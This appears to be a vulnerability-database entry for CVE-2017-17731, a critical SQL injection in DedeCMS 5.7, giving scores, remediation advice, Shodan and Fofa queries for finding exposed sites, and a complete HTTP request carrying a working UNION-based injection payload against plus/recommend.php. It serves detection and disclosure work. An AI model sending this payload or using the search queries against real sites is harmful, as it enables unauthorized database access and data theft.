| Title | DedeCMS 5.7 - SQL Injection |
|---|---|
| Author | j4vaovo |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. |
| Remediation | Apply the latest security patch or upgrade to a newer version of DedeCMS to mitigate the SQL Injection vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.84456 |
| CVE ID | CVE-2017-17731 |
| CWE ID | CWE-89 |
| Shodan Query | http.html:"DedeCms"cpe:"cpe:2.3:a:dedecms:dedecms"http.html:"dedecms" |
| Fofa Query | app="DedeCMS"app="dedecms"body="dedecms" |
| Tags | cve cve2017 sqli dedecms vkev vuln |
DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.
GET /plus/recommend.php?action&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(3504),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-17731.yaml
🦈 Packet Capture: ⬇️ Download cve-2017-17731.pcap
N/AN/A